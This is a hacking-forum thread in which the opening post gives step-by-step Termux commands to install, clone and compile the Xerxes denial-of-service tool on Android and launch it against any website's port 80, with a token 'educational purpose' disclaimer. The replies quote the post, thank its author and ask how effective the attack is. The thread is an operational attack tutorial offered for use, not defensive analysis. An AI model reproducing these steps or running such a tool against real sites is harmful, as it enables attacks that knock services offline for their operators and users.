Sign in to follow this  
Eminem

HOW TO DO DDOS ATTACK FROM ANDROID [TERMUX]

Recommended Posts

A Distributed Denial of Service (DDoS) attack is an attempt to make an online service unavailable by overwhelming it with traffic from multiple sources. They target a wide variety of important resources, from banks to news websites, and present a major challenge to making sure people can publish and access important information.

 

 

 

You can do DDOS attack via termux, using package Xerxes

 

[hide]

 

STEPS:-

 

 

1] Open termux app and execute  

command  **apt update && apt upgrade -y**

 

2] Next package  **apt install git && apt install clang -y**

 

3] Now, clone  **git clone

https://github.com/zanyarjamal/xerxes**

 

4] cd xerxes

 

5] Execute this command  **clang xerxes.c -o xerxes**

 

6] Now Done, You can launch Ddos attack with this command  **./xerxes your_website_url 80**

 

[/hide]

 

 

You are done with DDOS attack and this tutorial is only for enducational purpose

Share this post


Link to post
Share on other sites

I resech this thread <3

 

Thanks for this method, I was looking for.

Share this post


Link to post
Share on other sites

A Distributed Denial of Service (DDoS) attack is an attempt to make an online service unavailable by overwhelming it with traffic from multiple sources. They target a wide variety of important resources, from banks to news websites, and present a major challenge to making sure people can publish and access important information.

 

 

 

You can do DDOS attack via termux, using package Xerxes

 

 

 

 

You are done with DDOS attack and this tutorial is only for enducational purpose

 

 

hmm so what's the point of it

Share this post


Link to post
Share on other sites

A Distributed Denial of Service (DDoS) attack is an attempt to make an online service unavailable by overwhelming it with traffic from multiple sources. They target a wide variety of important resources, from banks to news websites, and present a major challenge to making sure people can publish and access important information.

 

 

 

You can do DDOS attack via termux, using package Xerxes

 

 

 

 

You are done with DDOS attack and this tutorial is only for enducational purpose

 

 

Nice. But how effect is this?

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this